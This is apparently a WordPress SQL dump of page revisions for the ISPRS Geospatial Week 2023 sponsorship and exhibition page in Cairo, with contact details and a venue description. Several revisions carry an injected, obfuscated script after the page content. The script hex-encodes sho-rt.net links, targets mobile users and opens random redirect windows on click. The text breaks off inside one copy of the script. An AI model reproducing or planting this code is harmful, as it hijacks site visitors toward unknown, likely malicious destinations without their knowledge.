_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 15:10:50','2022-10-26 15:10:50','',2920,'https://gsw2023.com/?p=2935',0,'revision','',0),
(2936,1,'2022-10-26 15:15:57','2022-10-26 15:15:57','','ext111','','inherit','open','closed','','ext111','','','2022-10-26 15:15:57','2022-10-26 15:15:57','',2920,'https://gsw2023.com/wp-content/uploads/2022/10/ext111.jpg',0,'attachment','image/jpeg',0),
(2937,1,'2022-10-26 15:16:54','2022-10-26 15:16:54','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2930\" img_size=\"1600x2000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 15:16:54','2022-10-26 15:16:54','',2920,'https://gsw2023.com/?p=2937',0,'revision','',0),
(2938,1,'2022-10-26 15:38:07','2022-10-26 15:38:07','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2930\" img_size=\"1600x2000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2019 website.</strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\n<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\n<p><strong>Heliopolis Campus</strong></p>\n<p><strong>P.O. Box 2033 -Elhorria El Moshir Ismail st.-behind Sheraton Bldg. (+202) 22685616 - 22685615</strong></p>\n<p><strong>(+202) 22685892</strong></p>\n<p>&nbsp;[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 